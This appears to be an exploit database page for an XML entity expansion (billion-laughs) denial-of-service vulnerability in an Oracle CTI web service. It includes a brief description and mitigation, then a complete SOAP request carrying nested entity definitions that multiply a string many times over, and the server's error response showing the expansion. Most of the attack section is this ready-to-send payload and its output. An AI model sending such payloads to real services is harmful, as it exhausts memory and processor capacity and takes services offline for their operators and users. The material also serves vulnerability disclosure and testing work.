header-logo
Suggest Exploit
vendor:
CTI Web Service
by:
omurugur
5.5
CVSS
MEDIUM
XML Entity Expansion Attack
611
CWE
Product Name: CTI Web Service
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Oracle CTI Web Service XML Entity Exp.

The XML entity expansion attack can be performed by sending requests that exceed the existing memory and processor capacities, causing memory bottlenecks and preventing the service from running.

Mitigation:

Implement input validation and proper entity expansion limits to prevent XML entity expansion attacks.
Source

Exploit-DB raw data:

# Exploit Title: Oracle CTI Web Service XML Entity Exp.
# Exploit Author: omurugur
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr

URL : http://server/EBS_ASSET_HISTORY_OPERATIONS

 

As can be seen in the following request / response example, the xml entity expansion attack can be performed, and this attack can send requests that exceed the existing memory and processor capacities, causing memory bottlenecks and preventing the service from running.

10kb more request is returned.
Examples Request;

 

POST /EBS_ASSET_HISTORY_OPERATIONS HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: text/xml;charset=UTF-8

SOAPAction: "getCampaignHistory"

Content-Length: 1696

Host: ****

User-Agent: Apache-HttpClient/4.1.1 (java 1.5)

Connection: close


<!DOCTYPE foo [<!ENTITY ha "Ha !"> <!ENTITY ha2 "&ha; &ha; &ha; &ha; &ha; &ha; &ha; &ha;"> <!ENTITY ha3 "&ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2;"> <!ENTITY ha4 "&ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3;"> <!ENTITY ha5 "&ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4;"> <!ENTITY ha6 "&ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5;"> ]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ebs="http://server/om/EBS_ASSET_HISTORY_OPERATIONS" xmlns:ave="http://server/AveaFrameWo&ha6;rk">

                <soapenv:Header/>

                <soapenv:Body>

                               <ebs:EbsRetrieveWebChatHistoryRequest>

                                               <ave:RequestHeader>

                                                               <ave:RequestId>

                                                                              <ave:GUID>152069827209115206982720</ave:GUID>

                                                               </ave:RequestId>

                                                               <ave:CallingSystem>SIEBEL</ave:CallingSystem>

                                                               <ave:BusinessProcessId>retrieveWebChatHistory</ave:BusinessProcessId>

                                               </ave:RequestHeader>

                                               <ebs:RequestBody>

                                                               <ebs:msisdn>5051234567</ebs:msisdn>

                                               </ebs:RequestBody>

                               </ebs:EbsRetrieveWebChatHistoryRequest>

                </soapenv:Body>

</soapenv:Envelope>

 
Example  Response1;


HTTP/1.1 500 Internal Server Error

Date: Tue, 17 Apr 2018 06:33:07 GMT

Content-Type: text/xml; charset=utf-8

X-ORACLE-DMS-ECID: c55d8ba7-c405-4117-8a70-8b37f745e8f0-0000b9df

X-ORACLE-DMS-RID: 0

Connection: close

Content-Length: 328676

 

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header xmlns:ave="http://server/AveaFrameWoHa ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha

! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha !rk" xmlns:ebs="http://server/om/EBS_ASSET_HISTORY_OPERATIONS"><soapenv:Fault><faultcode>soapenv:Server.SYS000000</faultcode><faultstring>Undefined Avea Service Bus Error</faultstring><detail><faul:ExceptionSchema xmlns:faul="http://server/Fault"><faul:UUID>MW-4b9f61d0-7792-4e54-a694-b9ef8c407b7e</faul:UUID><faul:Exception><faul:system>SYSTEM</faul:system><faul:code>OSB-382510</faul:code><faul:message>SYS000000:Undefined Avea Service Bus Error</faul:message><faul:stackTrace>PipelinePairNodePipelinePairNode_requestDynamic Validationrequest-pipelinetrue</faul:stackTrace></faul:Exception></faul:ExceptionSchema></detail></soapenv:Fault></soapenv:Body></soapenv:Envelope>

Navigation

Suggest Exploit

Services By CQR